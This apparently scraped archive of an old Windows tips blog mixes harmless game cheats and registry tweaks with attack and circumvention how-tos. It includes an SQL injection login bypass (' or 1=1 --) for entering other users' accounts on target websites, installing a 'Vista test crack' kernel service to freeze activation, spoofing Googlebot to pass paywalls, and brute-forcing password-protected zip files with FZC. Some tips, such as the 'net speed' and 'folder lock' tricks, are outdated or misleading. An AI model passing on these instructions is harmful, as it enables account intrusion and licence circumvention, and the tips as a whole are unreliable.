C:\Windows\system32>date
Current date: 12/31/2099 Thursday
Enter new date:
Type in current date, i.e. 12/19/2006.
Exit from command prompt, but do not restart the computer.
Download StopTimer.zip, StopTimer.zip, StopTimer.zip or StopTimer.zip torrent.
Extract the downloaded archive file into a folder. It should contains “Vista test crack.exe” and “timerstop.sys”.
Execute or run the “Vista test crack.exe” by right click on “Vista test crack.exe”, and select “Run as Administrator (A)”.
Optional: Press in Test button, and it will pop up a message says 4 timers are stopped. At this time, the counter should be freezed, Check with slmgr.vbs -dlv command, with the minutes left should be the same after a few minutes interval. If it’s the case, continue with the following steps to run the crack every startup.
In the Vista test crack window, click on “Install” button. You will be prompted with “Service installed” message if everything is done properly and correctly. The crack will copy the patched stoptimer.sys to system folder and install a new service named “timerstop” to stop kernel-mode timers in spsys.sys system file.
Exit from the crack, and restart the computer.
The hacking is basically done. Next few steps to to verify that the activation grace period built-in countdown timer is actually stopped and disable the timers from working properly, and make sure that the crack is installed properly. After restart, log on to Windows Vista. Run for a few minutes.
Press on Windows + R keys.
Type slmgr.vbs -dlv to check the time left to activate Windows Vista. If the time left is 43200 minutes that’s mean the crack is successful.

With the crack, you will have the following in the registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]
“Type”=dword:00000001
“Start”=dword:00000002
“ErrorControl”=dword:00000000
“ImagePath”=hex(2):5c,00,3f,00,3f,00,5c,00,45,00,3a,00,5c,00,57,00,69,00,6e,00,\
64,00,6f,00,77,00,73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
00,5c,00,54,00,69,00,6d,00,65,00,72,00,53,00,74,00,6f,00,70,00,2e,00,73,00,\
79,00,73,00,00,00
“DisplayName”=”TimerStop”

Windows game cheats

2008-01-30T07:12:00.000-08:00

Minesweeper

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Pinball

Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting

FreeCell

Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.

Solitaire

Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

Infinite Points

In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the "A" key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!

Infinite points trick II

To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.

registry hack which will allow you to see your opponents' cards
Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.

Remove windows messenger from xp

2008-01-30T07:02:00.000-08:00

Copy and paste the following to a text file, and save as RemoveMsgr.bat

@echo off
RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove
@echo REGEDIT4>%TMP%\RemoveMsgr.reg
@echo.>>%TMP%\RemoveMsgr.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express]>>%TMP%\RemoveMsgr.reg
@echo "Hide Messenger"=dword:00000002>>%TMP%\RemoveMsgr.reg
@echo.>>%TMP%\RemoveMsgr.reg
regedit /s %TMP%\RemoveMsgr.reg

• Close all Internet Explorer windows.
• Run RemoveMsgr.bat, When prompted, click Yes to close all affected applications.
• Restart your computer for the changes to take effect.

You are done ..

Secret Backdoor

2008-01-30T04:21:00.000-08:00

Many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5

Hacking web sites(another trick)

2008-01-30T04:18:00.000-08:00

Server with one step login can be accessed via this method.

Not For all Websites

If you have the html and javascript knowledge then you can access password protected websites.
1. Open the website you want to hack. Provide wrong username-password in its log in form.

(e.g : Username : me and Password: ' or 1=1 --)

An error will occur saying wrong username-password. Now be prepared

Your experiment starts from here...

2. Right click anywhere on that error page =>> go to view source.

3. There you can see the html codings with javascripts.

4. There you find somewhat like this.... <_form action="..login....">
< =..login....>

5. Before this login information<=__LOGIN> copy the url of the site in which you are.

(e.g :"<_form..........action=http://www.targetwebsite.com/login.......><..........=HTTP: com="">")<..........=HTTP: com="">

6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)

7. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there <=TEXT>instead of "<_type=password>"<=TEXT><=>. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )

8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\eg.html)

9. Reopen your target web page by double clicking eg.html' file that you have saved.

10. U see that some changes in current page as compared to original One. Don't get worried.

11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.

[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]

The above trick won't work on the websites using latest technique to protect there servers. But you can find many sites !!
Enjoy !!

Crack password protected zip files

2008-01-30T04:11:00.000-08:00

I will do by using FZC ..
What is FZC?
FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.

FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).

FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.

The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.

FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.

Now that you have a good wordlist, just get FZC working on the locked zip file

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.

If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.

--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------

The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers

Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.

--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50

--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.

Add an Option to Print the Contents of a Folder !!

2008-01-15T06:56:00.001-08:00

Add an Option to Print the Contents of a FolderFirst, you need to create a batch file called Printdir.bat. Open Notepad or another text editor and type (or cut and paste) this text:

@echo off
dir %1 /-p /o:gn > "%temp%\Listing"
start /w notepad /p "%temp%\Listing"
del "%temp%\Listing"
exit

Now, in the Save As dialog box, type "%windir%\Printdir.bat" (without the quotation marks) and click the Save button.
Click Start, Control Panel, Folder Options.
Click the File Types tab, and then click File Folder.
Click the Advanced button.
Click the New button.

In the Action box, type "Print Directory Listing" (without the quotation marks).

In the Application used to perform action box, type "Printdir.bat" (without the quotation marks).

Click OK in all three dialog boxes to close the dialog boxes.

You're not quite finished yet! Now you need to edit the Registry, so open your favorite Registry Editor.

Navigate to HKEY CLASSES ROOT\Directory\shell.

Right click on "default" and select Modify.
In the File Data box, type "none" (without the quotation marks).

Click OK and close the Registry Editor.

Now when you right click a folder, you'll see the option to Print Directory Listing. Selecting it will print the contents of the folder.

Increase your Net speed manually no need of Any software !!

2008-01-15T06:44:00.000-08:00

First, u need to goto
Start, then run.
Type in regedit in the box.
Next, goto the
folder HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\VxD\MSTCP
Now, find the string Default Rcv Window.
Now, edit the number to 64240 (was 65535).
Reboot your Computer and now you have Increase your Net Speed

Eliminating the Right Click on the Desktop !!

2008-01-15T06:43:00.000-08:00

Take backup Before Editing Any Registry

1. Start Regedit

2. Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer

3. Add a DWORD and give it a name of NoViewContextMenu

4. Give it a value of 1

5. Reboot

Disabling the F3 search key

2008-01-15T06:38:00.000-08:00

1. Start Regedit

2. Go to HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions

3. Create a Dword value called NoFindFiles

4. Give it a value of 1

5. Reboot

Change your processors name

2007-12-30T01:08:00.001-08:00

Go To Start and type RUN
TYPE REGEDIT
HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL

Processor
On Right Hand side just right click on Processor name and string and then Click Ok

Now Modify and write what you want to write ..

Turn off system beeps

2007-12-30T01:05:00.000-08:00

Navigate to HKEY_CURRENT_USER\Control Panel\Sound Once there, locate Beep on the list on the right.

Right click on it and select Modify
Change the value equal to no
Reboot your computer and the beeps will be gone!

Hide hard drives in Windows vista

2007-12-30T00:59:00.000-08:00

Back up your registry before you start!

1. Open Regedit

. 2. Navigate to one of these strings:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this only changes the settings for the current logged in user

HKEY_LOCALMACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this changes the settings for all users on the machine. You may have to create the key folder "Explorer" manually.

3. In the Explorer key folder, create a new DWORD value by right-clicking Explorer, then choosing New DWORD value. Name the value"NoDrives" (without the quotes). This value defines local and network drive visibility for each logical drive on the computer . All drives will be visible as long as this value's data is set to 0.

4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as NoDrives value data. When you right-click on NoDrives and choose Modify, make sure you select Decimal base, not Hexadecimal.

Drive Number to hide
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
All drives 67108863

If you want to hide more than one drive, you simply add the drive amounts together for a combined total.

For example, to hide the D:/ and T:/ drives, add the decimal value for the D:/ drive to the decimal value to the T:/ drive.

8 (D) + 524288 (T) = 524296

To disable all of your visible drives, set the value to 67108863.

You must reboot your PC to see your changes.

Hidden secrets(part 1)

2007-12-30T00:48:00.000-08:00

Doggy Sound In Acrobat Reader

You need: Acrobat Reader 4.0

Do the following :

1. Open up Acrobat Reader.
2. Choose Help, About Plug-ins, Acrobat Forms.
3. Hold down Control-Alt-Shift and click the Credits button.
4. You should hear a dog bark, the button face will change to say "woof," and the Adobe logo will turn into a dog paw.

Espionage in Excel

You need: Excel 2000 and DirectX

Do the following :

1. Open a new worksheet in Excel 2000.

2. Select File, Save as Web Page.

3. Select Publish and check the box marked Add interactivity with.

4. Save the file as spy.html. Be sure to note the folder you saved the file in.

5. Load Internet Explorer, and choose File, Open and locate spy.html. The spreadsheet should appear in the middle of the page.

6. Scroll to row 2000, column WC. Select row 2000, and move the tab key until WC is the active column in that row.

7. Hold down Shift-Crtl-Alt and click the Office logo in the upper-left corner of the dialog box.

8. Get ready to play a spy hunter-type game. Use your keyboard to move around and make things happen: The arrow keys let you drive; the space bar will let you fire; "O" lets you drop oil slicks; and "H" will turn on your headlights when it gets dark.

How to block and unblock websites

2007-12-27T01:56:00.000-08:00

Many times in schools, colleges & offices surfing some sites like orkut,etc are banned !

To overcome this you can unblock these or block some other websites and play pranks !

Do The Following :
For eg you want to block www.xyz.com !

* Open the folder C:\WINDOWS\system32\drivers\etc
* There you will find a file named HOSTS

* Click on the file and press SHIFT and now right click on it .
* From the right click menu select Open with .

* Now, select Notepad to open the file from the list !
* Now, in the file under the line 127.0.0.1 localhost add another line as 127.0.0.2 www.xyz.com.

* Now, File>>Save !

Now, open your web browser and try openning www.xyz.com , it will not load !

To unblock sites just do the opposite !

How to create a boot disk

2007-12-27T01:51:00.000-08:00

How to create a boot disk

This is quite simple.
1: Go into MY COMPUTER
2: Have a floppy disk in your drive and then RIGHT click on on the floppy drive and then click on FORMAT
3: You will be greeted with a number of options. The one you need to select is "Create an MS-DOS start up disk".
4: Click ok

Note: This requires up to 5 floppy disks and DOES NOT contain ANY CD-ROM drivers to boot from. A proper CD-ROM boot up disk is going to be release by Microsoft after the Windows XP public release. You can however use you old Windows Me start-up disk if you would prefer, as long as you have not upgraded to an NTFS drive.

Convert a FAT partition to NTFS

2007-12-27T01:42:00.000-08:00

To convert a FAT partition to NTFS, perform the following steps.

Click Start, click Programs, and then click Command Prompt.

In Windows XP, click Start, and then click Run.

At the command prompt, type CONVERT [driveletter]: /FS:NTFS.

Convert.exe will attempt to convert the partition to NTFS.

NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

Convert.exe will attempt to convert the partition to NTFS.

Lock your folders witout use of software

2007-12-27T01:39:00.000-08:00

Now lock your folders without the use of any additional software

Procedure :
1. Make a folder on the desktop and name it as "folder"
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the 'save as' name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the 'save as' name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

Simple !

Ever wanted to maintain a diary on your PC

2007-12-27T01:37:00.000-08:00

Ever wanted to maintain a diary on your PC ?
Now, you can do it without the use of a software !

USE NOTEPAD !

Do The Following :
1. Open Notepad
2. Type : .LOG
3. Save it with any name say 'Diary'
4. Open Diary.txt again

Wow you see today's date and time, so start writing your Diary !

Make your own icon in Windows XP

2007-12-27T01:34:00.000-08:00

Now even personalize your ICONS with Windows XP !

To make your own ICON :

1. Start>>All Programs>>Accessories
2. Click Paint
3. In toolbar select Image
4. Click Attributes

--------------------- Note : The size of a icon is 32 x 32 pixels ! ---------------------

5. Type 32 in both Height and Width and sure that Pixels is selected under Units
6. Click OK
7. Now add your photo or design .
8. File>>Save As
9. Type name.ico
10. Click Save

Enjoy your New ICON !!!

Xp registry hacks

2007-12-14T07:14:00.001-08:00

Editing the Windows Registry, while much more common now than in years past, is still not to be entered into lightly. You can break Windows, cause boot failure, yada, yada. I know you're gonna do it anyway; why else would you be reading this. Just be careful, OK?

These are few because, for the most part WinXP can be customized through the interlace or with third-party freeware (as above).

All of the tips below require running regedit. To do so, hit 'Start/Run' then type 'regedit' and follow the instructions.

Naturally, I take no responsibility for any damage or loss of data incurred in the remote possibility that something goes terribly wrong.

Outlook Explorer Splash
If it's important enough to you to edit the registry in order to get rid of the OE splash page, here's how. With regedit open, go to HKEY_CURRENT_USER\Identities\{long number here will vary}\Software\Microsoft\Outlook Express\5.0. left-click on 5.0 then right-click on a blank space in the pane on the right side. Choose 'New' DWORD and name it NSplash with a value of 1.

Unload DLLs
To prevent Windows from caching DLLs after the program using them has closed, follow this procedure: Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ then left-click on Explorer. Right-click (as above) and create the DWORD AlwaysUnloadDLL with a value of 1. This requires a reboot to take effect. This will allow memory to be used more efficiently.

Hack IE Title Bar
This can be an impressive bit of personalization. Use your name or moniker to brand Internet Explorer. Go to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on Main to change the string "Window Title" to whatever you wish.

Encode MP3s with WiMP
Install an MP3 codec (compression/decompression, required for this operation). You can download it here. Once installed, navigate to the following string in regedit:
HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Settings\ then to MP3Encoding and set the following:
"LowRate"=dword:0000dac0
"MediumRate"=dword:0001f400
"MediumHighRate"=dword:0003e800
"HighRate"=dword:0004e200
After reboot, you'll be in the MP3 business without third-party software.

Xp tricks part 2

2007-12-14T07:13:00.001-08:00

One-Button Adjustment
To change the built-in functions for either speed or visual effects, right-click on the 'My Computer' icon, then 'Properties' and the 'Advanced' tab. Hit the 'Settings' button and choose either 'Adjust for best appearance' or 'Adjust for best performance' to flip the switch on all of the graphical enhancements.

Folder Icons
For all folders except Thumbnails, pictures may be added or different icons may be chose, either from those in SHELL32.dll (default) or from any icon collection on your hard drive. Just right-click on the folder, choose 'Properties' then the 'Customize' tab & browse away.

Clear Type Innovation
This little goody, originally developed for laptops, will enhance your experience, both on and off the Internet. Hey. don't take my word for it, go here, say 'Yes' for the little program install the tune and tweak to you heart's content. You will enjoy the results.

Change is Good and So Easy
The quickest way to change your user name and the picture that appears next to it on the Start Menu is to double-click on that picture. From the menu that appears, you can change lotsa stuff. Pick a new picture. The pictures are 48 X 48 by default, but Windows XP will resize whatever you choose. The closer to the default size (and square), the better your results will be. Scan your face. Have fun with it. You can also prevent the irritating highlighting of newly-installed programs. Leave the option 'Set up my account to use .NET Passport' alone 'cause it's a security nightmare.

Your Desktop - Your Choices
Right-click on the Desktop. select 'Properties' then the 'Desktop' tab.
Hit the 'Customize Desktop' button and select which icons you want to appear.

In order to allow items (like custom shortcuts) to be added to the Taskbar, just right-click on it, choose 'Toolbars' then 'Quick Launch.' Delete any icons you don't want, drag shortcuts from the desktop to this new area.

Folder Options
Each folder can use its own display properties, set from the 'View' drop-down menu. Thumbnails makes sense for folders that contain images, of course. To speed the loading of this option go to the Control Panel and click 'Folder Options.' Under the 'View' tab, be certain that 'Do not cache thumbnails' is not checked.

The Ultimate Appearance Tweak
Microsoft Sez: "You can connect up to 10 monitors to your Windows XP-based computer and display numerous programs or windows at one time. You can use your mouse to move items from one monitor to
another. You can open a different file on each monitor. Or several. Or you can stretch one item across several monitors; so for example, you can see more columns in a Microsoft Excel spreadsheet, or the entire layout of a Web page, without scrolling." Consider it. Monitors and PCI video cards are pretty cheap now. Windows recognizes the addition & allows easy adjustments on the 'Display Properties/Settings' menu.

Xp tricks part 1

2007-12-14T07:09:00.000-08:00

Activate Once Forever
Windows will require re-activation if several pieces of hardware are changed at one time. It makes sense to try to spread these installations out to avoid the hassle.

But what if the WinXP OS must be re-installed on the same system? To avoid having to re-activate, keep a copy of wpa.dbl from the System32 folder with your backups. Make sure to create a fresh copy with any hardware upgrade. Upon re-installing WinXP, just copy wpa.dbl back to the System32 folder to skip activation.

Deactivate WinXP 'Spyware'
Although mentioned on the Windows Tweaks page, it's worth repeating here if you missed it. Win XP users have a new set of security issues, including a plethora of default settings that cause 'phone home' activity, automatic updates and downloads without user choice or intervention. The method for manually disabling these is here. Free software to change these settings easily is here.

WinXP Power Toys
This versatile (unsupported) collection of goodies from Microsoft includes:

Tweak UI: Provides access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more.

Super-Fast User Switcher: Switch between users without having to go through the Logon screen (see Quick Tips, below, for another way).

Open Command Window Here: Adds an "Open Command Window Here" context menu option on file system folders.

Taskbar Magnifier: Magnify part of the screen from the taskbar.

Power Calculator: Graph and evaluate functions as well as perform many different types of conversions.

Image Resizer: Resize one or many image files with a right-click.

CD Slide Show Generator: View images burned to a CD as a slide show.

Virtual Desktop Manager: Manage up to four desktops from the Windows taskbar. Multi-monitors is much better.

Webcam Timershot: Lets you take pictures at specified time intervals from a Webcam connected to your computer and save them to a location that you designate.

HTML Slide Show Wizard: Helps you create an HTML slide show of your digital pictures, ready to place on your Web site.

Microsoft pulled Power Toys for WinXP to de-bug them, and re-released them on April 23, 2002. This time, these proggies are available seperately which is a good thing. Click here to see 'em.

Don't forget IE Powertoys, a cool collection of enhancements designed for IE5.x but which work beautifully with IE6.x. Find it on the Internet page. Useful, fun and the price is right.

Hide Recycle Bin
Yes, there's a registry or 'inf' file hack for this, but why? Download TweakUI, above, change the Recycle Bin to a folder (so you can move it off the Desktop, like into My Documents), eliminate the icon and revel in your pristine desktop, without an icon to be seen (if you choose). Hey, your wallpaper looks great!

Remove 'Shortcut to' prefix and arrow
See TweakUI, above. Don't hack the registry unnecessarily.

Dig into the system
While there is a code that can be entered at a command-line prompt (ipconfig) which will display or allow configuration of ip information, but a sweeter solution is the GUI goodness of the familiar winipcfg from Win 9.X/Me. Download it from Microsoft here, install it, then just hit, Start/Run, type winipcfg and hit 'Enter.' You're so clever.

To access information on your entire system, including hardware, installed software application info and more, hit Start/Run and type winmsd. To access more information as well as change default startup items (harmlessly), try Start/Run msconfig.

Task Manager in WinXP is a versatile tool which displays running applications and processes (ala Ctrl/Alt/Del in Win 9.x/Me) as well as graphical display of Performance items like CPU, Page File Usage and Networking information. Right-click on the Taskbar and select 'Task Manager (keyboard shortcut Ctrl/Shift/Esc), Try it & see.

To configure virtually any aspect of WinXP hardware, software and behavior, hit Start/Run, type gpedit.msc and hit 'Enter' to access the Group Policy Editor. This is where you can turn off 'Autoplay' for CD-ROMs if you wish. Have fun in there.

Those Nasty Balloon Tips
These things are like the neighbor's wind chimes; an annoyance foisted upon us against our will that only gets more irritating with time. The quick, easy method of disposal is with 'Group Policy Editor, above. No third-party software or registry hacking is necessary. Choose' Disable Balloon Tips' and breathe a sigh of relief. Too bad there's no 'Delete' button for annoying neighbors.

WinXP Quick Tips
There are several methods (some involve risky and unnecessary registry hacks) for removing the persistent and annoying MSN Messenger. Hit 'Start/Run' then copy and paste the following: 'RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove' (without the quotes). Hit enter and it's gone.

To enable sending items wherever you wish on your computer easily, enable hidden and systems folders in the 'View' folder settings, open
C:\Documents and Settings\your_user_name\SendTo\ and add shortcuts to whatever locations you wish.

Instantly switch between users by depressing the Win key and 'Q' simultaneously. After a moment, all users appear. Keep hitting 'Q' to rotate between them.

You will use far less memory if you keep multiple applications minimized rather than in open windows.

To create a keyboard shortcut from a desktop shortcut, right-click on the shortcut, choose properties and enter the combination in the Shortcut Key box, including two of the following: CTRL, ALT, and/or SHIFT. OK out and it's done.

To eliminate the annoying question "Are you sure?" when you delete an item, right-click on the Recycle Bin icon, choose 'Properties' and remove the (default) checkmark from 'Display delete confirmation dialog.'

Prefetch works great to speed up operations in WinXP, but the default folder needs a cleanout every few weeks or the clutter will actually slow the system. Open the 'Prefetch' folder in C:\WINDOWS, left-click 'Edit,' choose 'Select All,' right click on any item in the folder and choose 'Delete' to dump everything.

Unless you spend most computer time doing searches, this tweak will add a little speed to your system. Open my computer, right-click on C:\ and select 'Properties.' Uncheck 'Allow indexing service to index this disk for faster searches.' uncheck this OK out. Select 'Apply to all folders and subfolders' in the pop-up window.

To prevent the operating system from asking for the WinXP disk during installations, copy the I386 folder from the XP CD and paste in into the C:\ drive. That'll stop it.

